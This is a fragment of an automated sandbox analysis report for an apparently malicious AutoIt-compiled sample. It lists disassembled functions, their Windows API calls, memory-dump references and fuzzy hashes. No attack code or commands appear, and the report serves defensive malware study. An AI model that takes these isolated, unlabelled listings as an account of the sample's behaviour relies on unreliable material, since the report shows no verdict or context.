                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                • String ID:
                                • API String ID: 2710830443-0
                                • Opcode ID: cd120fd4704c4b8a0bbf0d653434c769859604ac7f4518d5018a556762820711
                                • Instruction ID: 32aad479c2f85f0b65ce86fa71ff2660bbd833ef24032626c4b401143abd5699
                                • Opcode Fuzzy Hash: cd120fd4704c4b8a0bbf0d653434c769859604ac7f4518d5018a556762820711
                                • Instruction Fuzzy Hash: 1AE0ED715412A8BADB205FA2DC4DFDF7F5CEF567A2F408811B51E99060CA759580CBA0
                                Function 00C9BDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThread.KERNEL32 ref: 00C9BE01
                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,00C9B9C9), ref: 00C9BE08
                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00C9B9C9), ref: 00C9BE15
                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,00C9B9C9), ref: 00C9BE1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentOpenProcessThreadToken
                                • String ID:
                                • API String ID: 3974789173-0
                                • Opcode ID: 95974a154a43b54258abd968e3fcf2eae0f456e5372a47c7b5be6c2c7a0b08b3
                                • Instruction ID: ccc118d364348d43a0cf8a5808a5a198a100334f5b99cc054e8f8a93e2252568
                                • Opcode Fuzzy Hash: 95974a154a43b54258abd968e3fcf2eae0f456e5372a47c7b5be6c2c7a0b08b3
                                • Instruction Fuzzy Hash: 10E08632641291ABDB101FB1AD4CB9F3BACEF54792F048818F242DE050D7348941C761
                                Function 00C7B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                Download Yara Rule
                                APIs
                                • GetSysColor.USER32(00000008), ref: 00C7B0C5
                                • SetTextColor.GDI32(?,000000FF), ref: 00C7B0CF
                                • SetBkMode.GDI32(?,00000001), ref: 00C7B0E4
                                • GetStockObject.GDI32(00000005), ref: 00C7B0EC
                                • GetWindowDC.USER32(?,00000000), ref: 00CDECFA
                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CDED07
                                • GetPixel.GDI32(00000000,?,00000000), ref: 00CDED20
                                • GetPixel.GDI32(00000000,00000000,?), ref: 00CDED39
                                • GetPixel.GDI32(00000000,?,?), ref: 00CDED59
                                • ReleaseDC.USER32(?,00000000), ref: 00CDED64
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                • String ID:
                                • API String ID: 1946975507-0
                                • Opcode ID: a86a5dc70ffce91bb60c1e2aa67a9a23cdcd8024a1c0d9f89516bc2203c12f98
                                • Instruction ID: 60d6c38d4dffec1acead0d1e80badb19c2f569e4eabb3716efc670ece425b90c
                                • Opcode Fuzzy Hash: a86a5dc70ffce91bb60c1e2aa67a9a23cdcd8024a1c0d9f89516bc2203c12f98
                                • Instruction Fuzzy Hash: 73E0ED32500284AEEB216F74AC8979C3B21AB55336F14C266F77B9C0E2C7724A40DB11
                                Function 00CDC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 4cab39b0687f51ca74fc5a31b6b336542a761b7a3520ddeabcdc6696c4efb6ac
                                • Instruction ID: 3524705f3d1b995360b1e9a1c1dd3bf107954528320d72dcf6bb4b4f6cf6cd19
                                • Opcode Fuzzy Hash: 4cab39b0687f51ca74fc5a31b6b336542a761b7a3520ddeabcdc6696c4efb6ac
                                • Instruction Fuzzy Hash: 54E046B2500240EFDB105FB0CC88B6D3BA9EB4C360F11C806FD4B8F310DAB598819B00
                                Function 00C9C066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C9C071
                                • UnloadUserProfile.USERENV(?,?), ref: 00C9C07D
                                • CloseHandle.KERNEL32(?), ref: 00C9C086
                                • CloseHandle.KERNEL32(?), ref: 00C9C08E
                                  • Part of subcall function 00C9B850: GetProcessHeap.KERNEL32(00000000,?,00C9B574), ref: 00C9B857
                                  • Part of subcall function 00C9B850: HeapFree.KERNEL32(00000000), ref: 00C9B85E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                • String ID:
                                • API String ID: 146765662-0
                                • Opcode ID: 108ac63fd9aed968ae2f716805aa4591b13f85639f6807bab706483503cbe064
                                • Instruction ID: fd9060a50b8e6344324f6a56fc3b46ea933736f43b49022a3a66a972c5342b46
                                • Opcode Fuzzy Hash: 108ac63fd9aed968ae2f716805aa4591b13f85639f6807bab706483503cbe064
                                • Instruction Fuzzy Hash: 2DE0B636104046BFCB012FA5ED89A5DFB2AFF893213108225F626855B4CB32A871EB91
                                Function 00CDC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CapsDesktopDeviceReleaseWindow
                                • String ID:
                                • API String ID: 2889604237-0
                                • Opcode ID: 822c6a6868dfa6ace97e88df1c809b95fdd5b71b7fe3748b83339798244ad3f6
                                • Instruction ID: 951862f58fffcd3c38a16765ac0d69b3571127cd8d92372af1015db58c778edb
                                • Opcode Fuzzy Hash: 822c6a6868dfa6ace97e88df1c809b95fdd5b71b7fe3748b83339798244ad3f6
                                • Instruction Fuzzy Hash: 0CE0B6B5500244EFDB109F70DC8876D7BA9EB4C361F11C815F94F8F251DBB999819B50
                                Function 00C84C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                                Download Yara Rule
                                APIs
                                • __getptd_noexit.LIBCMT ref: 00C84C3E
                                  • Part of subcall function 00C886B5: GetLastError.KERNEL32(?,00C80127,00C888A3,00C84673,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C886B7
                                  • Part of subcall function 00C886B5: __calloc_crt.LIBCMT ref: 00C886D8
                                  • Part of subcall function 00C886B5: GetCurrentThreadId.KERNEL32 ref: 00C88701
                                  • Part of subcall function 00C886B5: SetLastError.KERNEL32(00000000,00C80127,00C888A3,00C84673,?,?,00C80127,?,00C6125D,00000058,?,?), ref: 00C88719
                                • CloseHandle.KERNEL32(?,?,00C84C1D), ref: 00C84C52
                                • __freeptd.LIBCMT ref: 00C84C59
                                • ExitThread.KERNEL32 ref: 00C84C61
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                                • String ID:
                                • API String ID: 408300095-0
                                • Opcode ID: 1ba4727e7d12e5d445ca76b7ff4f6f6b3a126ee0be80fe64e3d107a8f170dce8
                                • Instruction ID: 3fc06baaf1beb5fd77d497d5b3bda9051fe27f55fb92e622c3575a53ca336eb7
                                • Opcode Fuzzy Hash: 1ba4727e7d12e5d445ca76b7ff4f6f6b3a126ee0be80fe64e3d107a8f170dce8
                                • Instruction Fuzzy Hash: F4D0A731402A929BC13537208D0E70D36546F01B3EB024304F036094E09F214D05579A
                                Function 00CE2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: >$DEFINE
                                • API String ID: 4104443479-1664449232
                                • Opcode ID: 9a938aaffeec60e1f9e806a84db634a9d094ba85a382c6af9248782cc5c0467c
                                • Instruction ID: 5eece160361d490f4b64bf726c334e8d488d9f11d29ab8ac4de3eeda4ac04aef
                                • Opcode Fuzzy Hash: 9a938aaffeec60e1f9e806a84db634a9d094ba85a382c6af9248782cc5c0467c
                                • Instruction Fuzzy Hash: E1126C71A0024ADFCF24CF59C4C0AADB7B5FF48314F25825AE855AB391D734AE81DB90
                                Function 00C9EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                Download Yara Rule
                                APIs
                                • OleSetContainedObject.OLE32(?,00000001), ref: 00C9ECA0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ContainedObject
                                • String ID: AutoIt3GUI$Container
                                • API String ID: 3565006973-3941886329
                                • Opcode ID: c209ba81536b9d8ad213326be318f01d07aac2ec340a5b22c5d78cf0be90f318
                                • Instruction ID: 8df8864790daa266d47821d6d92816a8af2048354f5c62f66ea585fee6da65f8
                                • Opcode Fuzzy Hash: c209ba81536b9d8ad213326be318f01d07aac2ec340a5b22c5d78cf0be90f318
                                • Instruction Fuzzy Hash: 56913775600601AFDB14DF64C888B6ABBF5BF58710F24846DF84ACB291EB71E941CB60
                                Function 00CAE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C63BCF: _wcscpy.LIBCMT ref: 00C63BF2
                                  • Part of subcall function 00C684A6: __swprintf.LIBCMT ref: 00C684E5
                                  • Part of subcall function 00C684A6: __itow.LIBCMT ref: 00C68519
                                • __wcsnicmp.LIBCMT ref: 00CAE785
                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00CAE84E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                • String ID: LPT
                                • API String ID: 3222508074-1350329615
                                • Opcode ID: dabf65b364c8e5f65eba27061c1f3c8f2212ab068c5ecc365f6552232fff01c0
                                • Instruction ID: 11b00e0d8d39562c1f0251dd4354de732265dc18848644b78e8861b5906b1eca
                                • Opcode Fuzzy Hash: dabf65b364c8e5f65eba27061c1f3c8f2212ab068c5ecc365f6552232fff01c0
                                • Instruction Fuzzy Hash: 27619175A00216AFCB14EF98C895EBEB7F4EF4A314F004069F556AB390DB34AE44DB90
                                Function 00C61B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000000), ref: 00C61B83
                                • GlobalMemoryStatusEx.KERNEL32 ref: 00C61B9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: GlobalMemorySleepStatus
                                • String ID: @
                                • API String ID: 2783356886-2766056989
                                • Opcode ID: 14c4d16d1860504e0b46a0620ed62a0ab39f53b1d99b051e90925e449e881224
                                • Instruction ID: 4d32e2c7185fe93d98df9c93d5fb47524ecc178865814578580ced6bc0d99b06
                                • Opcode Fuzzy Hash: 14c4d16d1860504e0b46a0620ed62a0ab39f53b1d99b051e90925e449e881224
                                • Instruction Fuzzy Hash: A8513771408744ABE320AF24DC85BABBBECFB98354F41884DF1C8811A5EB71956DC762
                                Function 00CACE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00C6417D: __fread_nolock.LIBCMT ref: 00C6419B
                                • _wcscmp.LIBCMT ref: 00CACF49
                                • _wcscmp.LIBCMT ref: 00CACF5C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscmp$__fread_nolock
                                • String ID: FILE
                                • API String ID: 4029003684-3121273764
                                • Opcode ID: 0a18f31b58a84d84b00cd6c076737b8401f90459ba01a7464047550f8bc4e20c
                                • Instruction ID: aa3f0adc0635a49b5d1bdfcd695ed8433da12dfd3403f6eb2cbca473f956b6f5
                                • Opcode Fuzzy Hash: 0a18f31b58a84d84b00cd6c076737b8401f90459ba01a7464047550f8bc4e20c
                                • Instruction Fuzzy Hash: 8E41C632A0421ABEDF20DBA4CC81FEF7BB9AF4A714F000469F511E7191DB759A449B60
                                Function 00CCA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00CCA668
                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00CCA67D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend
                                • String ID: '
                                • API String ID: 3850602802-1997036262
                                • Opcode ID: 11fb406de42de5fcfe0f6ec3c628fd632c12fd06f2f6a8bbfbd7d9959d56322e
                                • Instruction ID: f07abd08ac7b31c58f4df586a89a0e9508bf54175ef1a29014a20253ddc30d9f
                                • Opcode Fuzzy Hash: 11fb406de42de5fcfe0f6ec3c628fd632c12fd06f2f6a8bbfbd7d9959d56322e
                                • Instruction Fuzzy Hash: FB410675A00309AFDB14CFA9C984FDABBB5FB09304F14446AE915EB381D770A942CFA1
                                Function 00CB57D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CB57E7
                                • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00CB581D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CrackInternet_memset
                                • String ID: |
                                • API String ID: 1413715105-2343686810
                                • Opcode ID: b77f19365a92362e3d7ee2d2e1cb0a416603e3e12dbf8de8e55bfc9d18f40e7b
                                • Instruction ID: 980839693723fd40b1cdeabb5df93d983489ef3487dad9e4972e57a11d5e770f
                                • Opcode Fuzzy Hash: b77f19365a92362e3d7ee2d2e1cb0a416603e3e12dbf8de8e55bfc9d18f40e7b
                                • Instruction Fuzzy Hash: D4311B71800119EBCF11AFA1DC95EEE7FB9FF18310F204119F815A61A2DB319A4ADB60
                                Function 00CC9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                Download Yara Rule
                                APIs
                                • DestroyWindow.USER32(?,?,?,?), ref: 00CC961B
                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00CC9657
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$DestroyMove
                                • String ID: static
                                • API String ID: 2139405536-2160076837
                                • Opcode ID: 0667f2f809c59c4b77680ff42cfe91b394824fe2e99b7cda806014c7835efc1f
                                • Instruction ID: d0f1d973a1e0fe1d4a2465b9a258de7739c0e2a12ee90d2f0156e3fabce1e766
                                • Opcode Fuzzy Hash: 0667f2f809c59c4b77680ff42cfe91b394824fe2e99b7cda806014c7835efc1f
                                • Instruction Fuzzy Hash: 02318931500604AEEB109F68DC84FFB77A9FF58764F00861DF8AAC7190CA31AD81DB60
                                Function 00CA5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 00CA5BE4
                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CA5C1F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: InfoItemMenu_memset
                                • String ID: 0
                                • API String ID: 2223754486-4108050209
                                • Opcode ID: 75c32aa0baad6fc23d14a9ba4e82132ca50f6313a45e06414d9a7f5ab5fd3857
                                • Instruction ID: 08c3b856f6e321564d7b618c60dbe51d68d0cd2a47d006eb6da14b0ec5771914
                                • Opcode Fuzzy Hash: 75c32aa0baad6fc23d14a9ba4e82132ca50f6313a45e06414d9a7f5ab5fd3857
                                • Instruction Fuzzy Hash: 4A31A731500706EFDB249F99D985BADBBF4EF0B36CF188019E991961A8D7709B44DF10
                                Function 00CB6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                Download Yara Rule
                                APIs
                                • __snwprintf.LIBCMT ref: 00CB6BDD
                                  • Part of subcall function 00C6CAEE: _memmove.LIBCMT ref: 00C6CB2F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __snwprintf_memmove
                                • String ID: , $$AUTOITCALLVARIABLE%d
                                • API String ID: 3506404897-2584243854
                                • Opcode ID: 4e95dbbd7a184a3925105e51e3613e2a0ccbfa315e7ab5c58184a77c6cb3ed4b
                                • Instruction ID: 9b7e9538f7469217cca82bfffb4dbd4f0c960daae47f673642cb2abccb7f437c
                                • Opcode Fuzzy Hash: 4e95dbbd7a184a3925105e51e3613e2a0ccbfa315e7ab5c58184a77c6cb3ed4b
                                • Instruction Fuzzy Hash: E9215C31600219BFCF14EFA4D8C2AEE7BB5AF49700F104459F545A7181DB74EA46EBA1
                                Function 00CC91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                Download Yara Rule
                                APIs
                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CC9269
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CC9274
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
